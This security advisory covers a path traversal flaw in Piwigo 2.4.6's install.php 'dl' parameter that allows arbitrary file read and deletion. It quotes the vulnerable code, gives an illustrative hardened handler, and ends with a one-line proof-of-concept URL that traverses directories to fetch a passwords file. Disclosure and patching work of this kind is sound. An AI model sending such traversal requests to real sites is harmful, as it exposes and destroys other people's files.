Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. The resulting security vulnerabilities allow an attacker to view arbitrary files on the affected computer and to delete arbitrary files within the context of the affected application.
====================================================================
/install.php (lines 113-124):
-------------

if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))  // 'dl' comes straight from the request; "../" sequences are never rejected
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);   // arbitrary file read
  unlink($filename);                   // followed by arbitrary file delete
  exit();
}
====================================================================
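A hardened version of the same download handler, added here as an illustrative example (it is not Piwigo's code and not the vendor's patch); it assumes the PHPWG_ROOT_PATH constant and the $conf['data_location'] setting used in the snippet above, and the helper name resolve_dl_file() is invented for this example:

```php
<?php
// Illustrative hardening of the install.php 'dl' handler (example code,
// not Piwigo's own and not the vendor patch). Assumed names: PHPWG_ROOT_PATH
// and $conf['data_location'] as in the advisory; resolve_dl_file() is ours.

define('PHPWG_ROOT_PATH', __DIR__ . '/');
$conf = array('data_location' => '_data/');

/**
 * Map the 'dl' request value to a file inside the data directory.
 * Returns the canonical path, or null if the request must be refused.
 */
function resolve_dl_file($dl, $data_dir)
{
    // 1. Allowlist the token itself: letters, digits and underscore only.
    //    No slashes, dots or NUL bytes, so "../" and "..\" cannot get through.
    if (!is_string($dl) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $dl)) {
        return null;
    }
    $base = realpath($data_dir);
    if ($base === false) {
        return null;
    }
    // 2. Canonicalise and confirm the target is a regular file that still
    //    lives under the data directory after symlink resolution.
    $path = realpath($base . DIRECTORY_SEPARATOR . 'pwg_' . $dl);
    if ($path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (!empty($_GET['dl'])) {
    $filename = resolve_dl_file($_GET['dl'], PHPWG_ROOT_PATH . $conf['data_location']);
    if ($filename === null) {
        // Refuse, and log the rejected value so traversal attempts are visible.
        error_log('install.php: rejected dl=' . var_export($_GET['dl'], true));
        http_response_code(400);
        exit('Invalid download request.');
    }
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
    header('Content-Disposition: attachment; filename="database.inc.php"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($filename));
    readfile($filename);   // only a validated, in-directory file reaches here
    unlink($filename);     // and only that file can be removed
    exit();
}
```

The two checks are complementary: the allowlist stops traversal strings before any filesystem call, and the realpath() prefix check catches anything (symlinks, unexpected data_location values) that the pattern alone would not.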
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                          @zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013
--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt